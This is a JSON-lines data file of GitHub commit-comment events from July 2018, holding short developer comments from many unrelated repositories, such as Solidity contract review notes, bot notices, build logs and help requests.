{"id":"8021346090","type":"CommitCommentEvent","actor":{"login":"vpArth"},"repo":{"name":"MedInTech/php-test-task-timur-isaev"},"payload":{"comment":{"id":29840668,"position":4,"line":10,"path":"index.php","commit_id":"3373476f2ec9c97bf1b1b2b75ff8ac36cd0b5ef6","created_at":"2018-07-26T08:56:05Z","updated_at":"2018-07-26T08:56:05Z","author_association":"NONE","body":"Не нашёл в проекте datetimepicker"}},"created_at":"2018-07-26T08:56:05Z"}
{"id":"8021350053","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29840678,"position":null,"line":null,"path":null,"commit_id":"5999af1a206993962b15b9d6ef634627ff98b01c","created_at":"2018-07-26T08:56:48Z","updated_at":"2018-07-26T08:56:48Z","author_association":"COLLABORATOR","body":"Puzzle `98-a72851ba` disappeared from [`lib/zold/type.rb`](https://github.com/zold-io/zold/blob/master/lib/zold/type.rb), that's why I closed #394. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-26T08:56:48Z"}
{"id":"8021350769","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29840680,"position":null,"line":null,"path":null,"commit_id":"5999af1a206993962b15b9d6ef634627ff98b01c","created_at":"2018-07-26T08:56:56Z","updated_at":"2018-07-26T08:56:56Z","author_association":"COLLABORATOR","body":"Puzzle `394-fda9e6d8` discovered in   [`lib/zold/type.rb`](  https://github.com/zold-io/zold/blob/master/lib/zold/type.rb)   and submitted as #421. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-26T08:56:56Z"}
{"id":"8021352829","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/RockPaperScissors"},"payload":{"comment":{"id":29840689,"position":1,"line":1,"path":"Contracts/Owned.sol","commit_id":"279e60591282f18d19dbdd574e6b6bbc716d6e82","created_at":"2018-07-26T08:57:19Z","updated_at":"2018-07-26T08:57:19Z","author_association":"NONE","body":"You probably meant `contracts/Owned.sol`, not `Contracts/Owned.sol`."}},"created_at":"2018-07-26T08:57:19Z"}
{"id":"8021353329","type":"CommitCommentEvent","actor":{"login":"diversys"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29840690,"position":null,"line":null,"path":null,"commit_id":"b52dff5267a144de293c9c06f7b0102ee22258b4","created_at":"2018-07-26T08:57:25Z","updated_at":"2018-07-26T08:57:25Z","author_association":"MEMBER","body":"LO can't find xcb now http://vmpkg.haiku-os.org/master/x86_64/logviewer.html?buildruns/1738/builds/11281.log"}},"created_at":"2018-07-26T08:57:25Z"}
{"id":"8021354879","type":"CommitCommentEvent","actor":{"login":"fildunsky"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29840693,"position":null,"line":null,"path":null,"commit_id":"be85d585480005b2a98ffccb6364a9b44d433a21","created_at":"2018-07-26T08:57:43Z","updated_at":"2018-07-26T08:57:43Z","author_association":"MEMBER","body":"Maybe with some icon...\r\n\r\n![post_history2](https://user-images.githubusercontent.com/32987666/43252413-1431ae16-90cb-11e8-8f45-ff12509f3b76.png)"}},"created_at":"2018-07-26T08:57:43Z"}
{"id":"8021355919","type":"CommitCommentEvent","actor":{"login":"max-spark"},"repo":{"name":"SparkMicroGrants/sparkit"},"payload":{"comment":{"id":29840696,"position":null,"line":null,"path":null,"commit_id":"89869d848a7911ec73e004db5ac8a0b5c3028f5e","created_at":"2018-07-26T08:57:55Z","updated_at":"2018-07-26T08:57:55Z","author_association":"NONE","body":"Changing Community Number"}},"created_at":"2018-07-26T08:57:55Z"}
{"id":"8021357973","type":"CommitCommentEvent","actor":{"login":"Vic-shi"},"repo":{"name":"Vic-shi/wzbhc"},"payload":{"comment":{"id":29840707,"position":null,"line":null,"path":null,"commit_id":"db04e77e2be46618fdbd0aeb419956c2db015c7a","created_at":"2018-07-26T08:58:19Z","updated_at":"2018-07-26T08:58:19Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-26T08:58:19Z"}
{"id":"8021360724","type":"CommitCommentEvent","actor":{"login":"VictorGijsbers"},"repo":{"name":"i7/kerkerkruip"},"payload":{"comment":{"id":29840711,"position":null,"line":null,"path":null,"commit_id":"913f275c1eedad1a7e46b4ff26630e18cf2973c6","created_at":"2018-07-26T08:58:50Z","updated_at":"2018-07-26T08:58:50Z","author_association":"MEMBER","body":"Good idea! Much better than changing the test texts."}},"created_at":"2018-07-26T08:58:50Z"}
{"id":"8021361508","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/RockPaperScissors"},"payload":{"comment":{"id":29840713,"position":33,"line":33,"path":"Contracts/RockPaperScissors.sol","commit_id":"07895be446a45c1fcc723b3fdfe45f5c0f401c32","created_at":"2018-07-26T08:58:59Z","updated_at":"2018-07-26T08:58:59Z","author_association":"NONE","body":"You could make explicit these constants by the use of `uint constant ROCK = 0` or `enum`."}},"created_at":"2018-07-26T08:58:59Z"}
{"id":"8021362528","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/RockPaperScissors"},"payload":{"comment":{"id":29840715,"position":33,"line":33,"path":"Contracts/RockPaperScissors.sol","commit_id":"07895be446a45c1fcc723b3fdfe45f5c0f401c32","created_at":"2018-07-26T08:59:11Z","updated_at":"2018-07-26T08:59:11Z","author_association":"NONE","body":"Same for the outcome."}},"created_at":"2018-07-26T08:59:11Z"}
{"id":"8021363295","type":"CommitCommentEvent","actor":{"login":"winoz2017"},"repo":{"name":"winoz2017/view"},"payload":{"comment":{"id":29840716,"position":null,"line":null,"path":null,"commit_id":"74e7480b7edde94f71bbbf125d527fa5c585120b","created_at":"2018-07-26T08:59:20Z","updated_at":"2018-07-26T08:59:20Z","author_association":"OWNER","body":"알았음"}},"created_at":"2018-07-26T08:59:20Z"}
{"id":"8021364923","type":"CommitCommentEvent","actor":{"login":"dev-juno"},"repo":{"name":"dev-juno/ps"},"payload":{"comment":{"id":29840719,"position":null,"line":null,"path":null,"commit_id":"fe136662825a9be32e7c35455ce042f5164494d2","created_at":"2018-07-26T08:59:38Z","updated_at":"2018-07-26T08:59:38Z","author_association":"OWNER","body":"update june 2018"}},"created_at":"2018-07-26T08:59:38Z"}
{"id":"8021367642","type":"CommitCommentEvent","actor":{"login":"houjb"},"repo":{"name":"YutingZhang/gait-sp"},"payload":{"comment":{"id":29840726,"position":null,"line":null,"path":null,"commit_id":"5bb52557e603fd7154a79c6fe3c4a099a47d084f","created_at":"2018-07-26T09:00:09Z","updated_at":"2018-07-26T09:00:09Z","author_association":"NONE","body":"hello，I need help.Can you provide experimental data ? please."}},"created_at":"2018-07-26T09:00:09Z"}
{"id":"8021370087","type":"CommitCommentEvent","actor":{"login":"Mazda--"},"repo":{"name":"DotOS/android_packages_apps_Dialer"},"payload":{"comment":{"id":29840738,"position":null,"line":null,"path":null,"commit_id":"d368a016b5aac3cd9ba57ed13b0dd1f4a5f782f0","created_at":"2018-07-26T09:00:31Z","updated_at":"2018-07-26T09:00:31Z","author_association":"NONE","body":"Yeah, it would be one thing to come up with it yourself but considering this commit has been circulating around for a while now, I highly doubt that @samgrande. Add in that your project keeps getting accused of kanging almost on weekly, it hard to believe that you guys are doing anything more than just seeing what you can get away with.\r\n\r\n@mohancm I keep seeing the 'it won't happen again' but here's the funny thing, it keeps on happening again and again and again lol"}},"created_at":"2018-07-26T09:00:31Z"}
{"id":"8021370214","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/RockPaperScissors"},"payload":{"comment":{"id":29840739,"position":41,"line":41,"path":"Contracts/RockPaperScissors.sol","commit_id":"07895be446a45c1fcc723b3fdfe45f5c0f401c32","created_at":"2018-07-26T09:00:32Z","updated_at":"2018-07-26T09:00:32Z","author_association":"NONE","body":"Notice also that `winnerMatrix[234][678]` will also be a tie, because `0`. To avoid this confusion, you could assign \"no outcome\" to `0`."}},"created_at":"2018-07-26T09:00:32Z"}
{"id":"8021370524","type":"CommitCommentEvent","actor":{"login":"aabou"},"repo":{"name":"onap/externalapi-nbi"},"payload":{"comment":{"id":29840741,"position":null,"line":null,"path":null,"commit_id":"9d353deac4cbdeada20028515817314bfed02f0c","created_at":"2018-07-26T09:00:35Z","updated_at":"2018-07-26T09:00:35Z","author_association":"NONE","body":"Hi Gays,\r\nI tried to follow your installation guide, but i have some problems.\r\n- first, I was obliged to upgrade version from \"2\" to \"2.1\" or \"2.2\" in docker-compose.yml to make it work withe the latest version of docker.\r\nmy local docker conf is:\r\n\r\nClient:\r\n Version:           18.06.0-ce\r\n API version:       1.38\r\n Go version:        go1.10.3\r\n Git commit:        0ffa825\r\n Built:             Wed Jul 18 19:05:28 2018\r\n OS/Arch:           windows/amd64\r\n Experimental:      false\r\n\r\nServer:\r\n Engine:\r\n  Version:          18.06.0-ce\r\n  API version:      1.38 (minimum version 1.24)\r\n  Go version:       go1.10.3\r\n  Git commit:       0ffa825\r\n  Built:            Wed Jul 18 19:23:19 2018\r\n  OS/Arch:          windows/amd64\r\n  Experimental:     false\r\n- Second (after upgrading), all command are ok until the execution of the cmd : docker-compose up -d mongo mariadb the result is: \r\nWARNING: The SDC_IP variable is not set. Defaulting to a blank string.\r\nWARNING: The AAI_IP variable is not set. Defaulting to a blank string.\r\nWARNING: The SO_IP variable is not set. Defaulting to a blank string.\r\nPulling mongo (mongo:3)...\r\n3: Pulling from library/mongo\r\n3889bb8d808b: Extracting [==================================================>]   4.07GB/4.07GB\r\nfb1ebf2c42b6: Download complete\r\n331fd417053d: Download complete\r\nf1f7c506c655: Download complete\r\n2f8dfe512fb7: Download complete\r\n97ede4d15341: Download complete\r\n4a49e6c1c55f: Download complete\r\n7ac80d277b3b: Download complete\r\na189f1c72a2e: Download complete\r\nb941d73f5d20: Download complete\r\n**ERROR: failed to register layer**: rename C:\\ProgramData\\Docker\\image\\windowsfilter\\layerdb\\tmp\\write-set-836736647 C:\\ProgramData\\Docker\\image\\windowsfilter\\layerdb\\sha256\\f358be10862ccbc329638\r\nb9e10b3d497dd7cd28b0e8c7931b4a545c88d7f7cd6: **Access is denied.**\r\n\r\nAny help are welcome!\r\n\r\nBR"}},"created_at":"2018-07-26T09:00:35Z"}
{"id":"8021372515","type":"CommitCommentEvent","actor":{"login":"zoispetsieri"},"repo":{"name":"jonathansick/starfisher"},"payload":{"comment":{"id":29840747,"position":null,"line":null,"path":null,"commit_id":"55742fd75d6f6a8e761c1c68c26ec27e06109342","created_at":"2018-07-26T09:00:57Z","updated_at":"2018-07-26T09:00:57Z","author_association":"NONE","body":"Hello,\r\nIs there a manual for how to use these programs?\r\n"}},"created_at":"2018-07-26T09:00:57Z"}
{"id":"8021375244","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/RockPaperScissors"},"payload":{"comment":{"id":29840753,"position":31,"line":31,"path":"Contracts/RockPaperScissors.sol","commit_id":"07895be446a45c1fcc723b3fdfe45f5c0f401c32","created_at":"2018-07-26T09:01:24Z","updated_at":"2018-07-26T09:01:24Z","author_association":"NONE","body":"Do you see what you did right there? You overwrote `Owned`'s field. It is unprotected. That's why you should make `private` the fields of parent classes. To avoid that."}},"created_at":"2018-07-26T09:01:24Z"}
{"id":"8021375940","type":"CommitCommentEvent","actor":{"login":"wosc"},"repo":{"name":"ZeitOnline/zeit.find"},"payload":{"comment":{"id":29840754,"position":null,"line":null,"path":null,"commit_id":"86444986a5630131cbc962cba94ce9fc2f2f5208","created_at":"2018-07-26T09:01:31Z","updated_at":"2018-07-26T09:01:31Z","author_association":"MEMBER","body":"In der Theorie wendet ES beim Suchen den gleichen Analyzer auf den Suchterm an wie beim Indizieren auf den Feldwert, d.h. es sollte überflüssig sein, den lowercase client-seitig vorauseilend zu tun. Ich _meine_ ich hätte das auch ausprobiert, aber jetzt verunsicherst du mich..."}},"created_at":"2018-07-26T09:01:31Z"}
{"id":"8021377352","type":"CommitCommentEvent","actor":{"login":"AHOHNMYC"},"repo":{"name":"saber-nyan/pod042-bot"},"payload":{"comment":{"id":29840755,"position":null,"line":null,"path":null,"commit_id":"6eb467e5ff56c96c0d9e4f774856eb6903e453f7","created_at":"2018-07-26T09:01:45Z","updated_at":"2018-07-26T09:01:45Z","author_association":"NONE","body":"Лох! Пидр!"}},"created_at":"2018-07-26T09:01:45Z"}
{"id":"8021383540","type":"CommitCommentEvent","actor":{"login":"feruzm"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29840778,"position":null,"line":null,"path":null,"commit_id":"be85d585480005b2a98ffccb6364a9b44d433a21","created_at":"2018-07-26T09:02:53Z","updated_at":"2018-07-26T09:02:53Z","author_association":"MEMBER","body":"Can we also move Show Diff bottom of Versions list and make sure it is formed as button so user knows that it is clickable?"}},"created_at":"2018-07-26T09:02:53Z"}
{"id":"8021385068","type":"CommitCommentEvent","actor":{"login":"rKaradjia"},"repo":{"name":"rKaradjia/Autoroute_angular"},"payload":{"comment":{"id":29840784,"position":null,"line":null,"path":null,"commit_id":"5895e6a4add67f77cf7db40c8657b577393b8890","created_at":"2018-07-26T09:03:11Z","updated_at":"2018-07-26T09:03:11Z","author_association":"OWNER","body":"L'insertion a lieu mais une erreur reste à corriger : \r\n\r\nDans le navigateur : \r\nmessage: \"Http failure during parsing for http://localhost:3000/reservations\"\r\nname: \"HttpErrorResponse\"\r\n\r\nOrigine à déterminer \r\n"}},"created_at":"2018-07-26T09:03:11Z"}
{"id":"8021385341","type":"CommitCommentEvent","actor":{"login":"MikhailTymchukDX"},"repo":{"name":"DevExpress-Examples/aspxdocumentviewer-how-to-dynamically-preview-a-report-in-document-viewer-after-a-button-w-t132094"},"payload":{"comment":{"id":29840785,"position":null,"line":null,"path":null,"commit_id":"5f4e4dacd19e5c5734754284bed1f3047074633e","created_at":"2018-07-26T09:03:14Z","updated_at":"2018-07-26T09:03:14Z","author_association":"NONE","body":"I checked the link and it leads to the repository root, where you can navigate C# code located in the CS folder:\r\n![2018-07-26_11-53-26](https://user-images.githubusercontent.com/17080984/43252267-c11aba60-90ca-11e8-88a2-308edca8901d.gif)\r\n\r\n"}},"created_at":"2018-07-26T09:03:14Z"}
{"id":"8021385435","type":"CommitCommentEvent","actor":{"login":"gagandeepb"},"repo":{"name":"gagandeepb/Frames-beam"},"payload":{"comment":{"id":29840786,"position":19,"line":19,"path":"src/FramesBeam/Streaming.hs","commit_id":"1a213e4198128582ae1383de4d224983b7fb97cf","created_at":"2018-07-26T09:03:16Z","updated_at":"2018-07-26T09:03:16Z","author_association":"OWNER","body":"Some of these constraints correspond to instance declarations in the generated Schema.hs file. So the end user doesn't really have to care much about these constraints (the `tbl` and `db` args that are passed to any of these functions are also in the generated Schema.hs), and there is a clear reference between generated code and some of the constraints. But if you think usability for new users can be improved by introducing a new typeclass, that hides some of the constraints, then sure I can have a look. "}},"created_at":"2018-07-26T09:03:16Z"}
{"id":"8021386424","type":"CommitCommentEvent","actor":{"login":"Unicornbaka"},"repo":{"name":"Unicornbaka/copy_jingdong"},"payload":{"comment":{"id":29840788,"position":null,"line":null,"path":null,"commit_id":"c6eda6a7db1049d70d58efeb879bc0f9d442708e","created_at":"2018-07-26T09:03:27Z","updated_at":"2018-07-26T09:03:27Z","author_association":"OWNER","body":"去掉了一个空格，打扰了。"}},"created_at":"2018-07-26T09:03:27Z"}
{"id":"8021389795","type":"CommitCommentEvent","actor":{"login":"jpfr"},"repo":{"name":"open62541/open62541"},"payload":{"comment":{"id":29840793,"position":null,"line":null,"path":null,"commit_id":"560f685ff9250f413cd76e98cd3b5791ed374f51","created_at":"2018-07-26T09:04:04Z","updated_at":"2018-07-26T09:04:04Z","author_association":"CONTRIBUTOR","body":"@jdbdr\r\nThanks. We will fix this."}},"created_at":"2018-07-26T09:04:04Z"}
{"id":"8021390322","type":"CommitCommentEvent","actor":{"login":"AbdoBoum"},"repo":{"name":"suraj-deshmukh/BBC-Dataset-News-Classification"},"payload":{"comment":{"id":29840795,"position":null,"line":null,"path":null,"commit_id":"21817aa6f0e79dfc83d2b141f48a6ec55d39bed8","created_at":"2018-07-26T09:04:10Z","updated_at":"2018-07-26T09:04:10Z","author_association":"NONE","body":"can you repost model/vectorizer.pkl exported with python 3 ?"}},"created_at":"2018-07-26T09:04:10Z"}
{"id":"8021390476","type":"CommitCommentEvent","actor":{"login":"W0w3"},"repo":{"name":"W0w3/node-red-contrib-mssql-ps"},"payload":{"comment":{"id":29840796,"position":6,"line":31,"path":"mssql-ps/mssql-ps.js","commit_id":"81aea5ca91524dc7de5c792188be1b4a73cbdc50","created_at":"2018-07-26T09:04:12Z","updated_at":"2018-07-26T09:04:12Z","author_association":"OWNER","body":"watch issue #610 of node-mssql => https://github.com/tediousjs/node-mssql/issues/610"}},"created_at":"2018-07-26T09:04:12Z"}
{"id":"8021392680","type":"CommitCommentEvent","actor":{"login":"Skayo"},"repo":{"name":"semicolon-package/semicolon.js"},"payload":{"comment":{"id":29840798,"position":null,"line":null,"path":null,"commit_id":"8499f17ebbd1adb424c2e5b6de708e7ee90bc449","created_at":"2018-07-26T09:04:38Z","updated_at":"2018-07-26T09:04:38Z","author_association":"COLLABORATOR","body":"How did I miss this wtf xD"}},"created_at":"2018-07-26T09:04:38Z"}
{"id":"8021393521","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/RockPaperScissors"},"payload":{"comment":{"id":29840804,"position":44,"line":44,"path":"Contracts/RockPaperScissors.sol","commit_id":"07895be446a45c1fcc723b3fdfe45f5c0f401c32","created_at":"2018-07-26T09:04:46Z","updated_at":"2018-07-26T09:04:46Z","author_association":"NONE","body":"True, a `uint8` looks logical, but in all likelihood it adds to the gas cost because all arguments are packed to 32 bytes and the code will clip it."}},"created_at":"2018-07-26T09:04:46Z"}
{"id":"8021398656","type":"CommitCommentEvent","actor":{"login":"Roc-J"},"repo":{"name":"Roc-J/zhaoshang_economic_news"},"payload":{"comment":{"id":29840823,"position":null,"line":null,"path":null,"commit_id":"6c0c63a55f1eaf0e9f1820f9824b75acdbb2414b","created_at":"2018-07-26T09:05:44Z","updated_at":"2018-07-26T09:05:44Z","author_association":"OWNER","body":"@WangYanZ 我也是新手～没有什么请教之说哈"}},"created_at":"2018-07-26T09:05:44Z"}
{"id":"8021400574","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/RockPaperScissors"},"payload":{"comment":{"id":29840826,"position":49,"line":49,"path":"Contracts/RockPaperScissors.sol","commit_id":"07895be446a45c1fcc723b3fdfe45f5c0f401c32","created_at":"2018-07-26T09:06:07Z","updated_at":"2018-07-26T09:06:07Z","author_association":"NONE","body":"Well if there is a player, then the amount was `bidAmount`, so no need to repeat that."}},"created_at":"2018-07-26T09:06:07Z"}
{"id":"8021401469","type":"CommitCommentEvent","actor":{"login":"anjeylink"},"repo":{"name":"pixelant/pxa_product_manager"},"payload":{"comment":{"id":29840829,"position":null,"line":null,"path":null,"commit_id":"33de1fef4eef302f72b4cd670542490f80908e76","created_at":"2018-07-26T09:06:16Z","updated_at":"2018-07-26T09:06:16Z","author_association":"COLLABORATOR","body":"It's possible to get order value with {order.orderFields.field_name.value}"}},"created_at":"2018-07-26T09:06:16Z"}
{"id":"8021404890","type":"CommitCommentEvent","actor":{"login":"vpArth"},"repo":{"name":"MedInTech/php-test-task-timur-isaev"},"payload":{"comment":{"id":29840835,"position":51,"line":28,"path":"loading.php","commit_id":"3373476f2ec9c97bf1b1b2b75ff8ac36cd0b5ef6","created_at":"2018-07-26T09:06:54Z","updated_at":"2018-07-26T09:06:54Z","author_association":"NONE","body":"Много глобальных переменных, следует предоставить какой-нибудь интерфейс для получения этих объектов."}},"created_at":"2018-07-26T09:06:54Z"}
{"id":"8021405484","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/RockPaperScissors"},"payload":{"comment":{"id":29840836,"position":44,"line":44,"path":"Contracts/RockPaperScissors.sol","commit_id":"07895be446a45c1fcc723b3fdfe45f5c0f401c32","created_at":"2018-07-26T09:07:01Z","updated_at":"2018-07-26T09:07:01Z","author_association":"NONE","body":"Also, the other player only needs to look at the first player's transaction and see the choice. Then submit a choice that beats the first player. So the 1st one to submit always loses."}},"created_at":"2018-07-26T09:07:01Z"}
{"id":"8021412284","type":"CommitCommentEvent","actor":{"login":"houjb"},"repo":{"name":"Jimmy-Lo/gait_recognition"},"payload":{"comment":{"id":29840839,"position":null,"line":null,"path":null,"commit_id":"5a8156793fef96cbe967f31165aa3f399e2033b0","created_at":"2018-07-26T09:08:20Z","updated_at":"2018-07-26T09:08:20Z","author_association":"NONE","body":"hello,I need your help, Can you provide the experiment data?please."}},"created_at":"2018-07-26T09:08:20Z"}
{"id":"8021418191","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29840846,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-26T09:09:27Z","updated_at":"2018-07-26T09:09:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T09:09:27Z"}
{"id":"8021419832","type":"CommitCommentEvent","actor":{"login":"VadymKyrylenko"},"repo":{"name":"VadymKyrylenko/temp1"},"payload":{"comment":{"id":29840849,"position":5,"line":4,"path":"index.html","commit_id":"8c2f621b12fc019e800f221d30473a2778ff6d1b","created_at":"2018-07-26T09:09:43Z","updated_at":"2018-07-26T09:09:43Z","author_association":"OWNER","body":"Yakov was trying to be funny."}},"created_at":"2018-07-26T09:09:43Z"}
{"id":"8021421548","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29840853,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-26T09:10:02Z","updated_at":"2018-07-26T09:10:02Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T09:10:02Z"}
{"id":"8021421984","type":"CommitCommentEvent","actor":{"login":"fildunsky"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29840855,"position":null,"line":null,"path":null,"commit_id":"be85d585480005b2a98ffccb6364a9b44d433a21","created_at":"2018-07-26T09:10:08Z","updated_at":"2018-07-26T09:10:08Z","author_association":"MEMBER","body":"Yes, something like that...\r\n\r\n![post_history3](https://user-images.githubusercontent.com/32987666/43253101-d1734d58-90cc-11e8-9a30-179cde48be35.png)\r\n"}},"created_at":"2018-07-26T09:10:08Z"}
{"id":"8021422894","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29840856,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-26T09:10:18Z","updated_at":"2018-07-26T09:10:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T09:10:18Z"}
{"id":"8021424613","type":"CommitCommentEvent","actor":{"login":"cnuke"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29840859,"position":null,"line":null,"path":null,"commit_id":"460d6b3942314f113015d37db475cee24e4d851c","created_at":"2018-07-26T09:10:38Z","updated_at":"2018-07-26T09:10:38Z","author_association":"NONE","body":"@alex-ab done."}},"created_at":"2018-07-26T09:10:38Z"}
{"id":"8021425294","type":"CommitCommentEvent","actor":{"login":"tlil"},"repo":{"name":"corda/corda"},"payload":{"comment":{"id":29840860,"position":4,"line":18,"path":"docs/source/cli-ux-guidelines.rst","commit_id":"134e6dc9dfcc6bcfe9893611e681af60cf9f75f9","created_at":"2018-07-26T09:10:46Z","updated_at":"2018-07-26T09:10:46Z","author_association":"CONTRIBUTOR","body":"Bash and ZSH completion files"}},"created_at":"2018-07-26T09:10:46Z"}
{"id":"8021425793","type":"CommitCommentEvent","actor":{"login":"fupuchu"},"repo":{"name":"fupuchu/ding-kat"},"payload":{"comment":{"id":29840862,"position":null,"line":null,"path":null,"commit_id":"9aa7901a30f00bb50ac1dcd10040e1aa969446a8","created_at":"2018-07-26T09:10:53Z","updated_at":"2018-07-26T09:10:53Z","author_association":"OWNER","body":"thanks @jellythewobbly "}},"created_at":"2018-07-26T09:10:53Z"}
{"id":"8021427805","type":"CommitCommentEvent","actor":{"login":"feruzm"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29840868,"position":null,"line":null,"path":null,"commit_id":"be85d585480005b2a98ffccb6364a9b44d433a21","created_at":"2018-07-26T09:11:15Z","updated_at":"2018-07-26T09:11:15Z","author_association":"MEMBER","body":"Yeap 😊 \r\n**Edit History**"}},"created_at":"2018-07-26T09:11:15Z"}
{"id":"8021431505","type":"CommitCommentEvent","actor":{"login":"ianfab"},"repo":{"name":"ianfab/Makruk-Stockfish"},"payload":{"comment":{"id":29840877,"position":null,"line":null,"path":null,"commit_id":"72e094284146c2db8f14c511e2794099c3158305","created_at":"2018-07-26T09:11:58Z","updated_at":"2018-07-26T09:11:58Z","author_association":"OWNER","body":"@thaichessswinboard Thanks for your feedback. I did not have the possibility to test the aforementioned endgames yet, but from the code it should be clear that it never prefers KNQK over KBQK, since `VALUE_KNOWN_WIN` is added for the KBQK endgame, which means that it is evaluated >+100 pawns, whereas the KNQK evaluation is close to zero (unless mate is found).\r\n\r\nI guess the issue is that it does not see a way to force a KBQK endgame (since otherwise it would go for it), so there seemingly are only the two possibilities of continuing the KNBQKN/KNBQKR endgame or simplifying to KNQK, and there it might wrongly prefer KNQK. I will have a closer look at this tomorrow. If you could provide some problematic positions, that would be nice, since it is then easier to investigate the issue."}},"created_at":"2018-07-26T09:11:58Z"}
{"id":"8021432346","type":"CommitCommentEvent","actor":{"login":"kroeckx"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":29840879,"position":null,"line":null,"path":null,"commit_id":"feac7a1c8be49fbcb76fcb721ec9f02fdd91030e","created_at":"2018-07-26T09:12:09Z","updated_at":"2018-07-26T09:12:09Z","author_association":"MEMBER","body":"Fix in #6794\n"}},"created_at":"2018-07-26T09:12:09Z"}
{"id":"8021437023","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29840888,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-26T09:12:59Z","updated_at":"2018-07-26T09:12:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T09:12:59Z"}
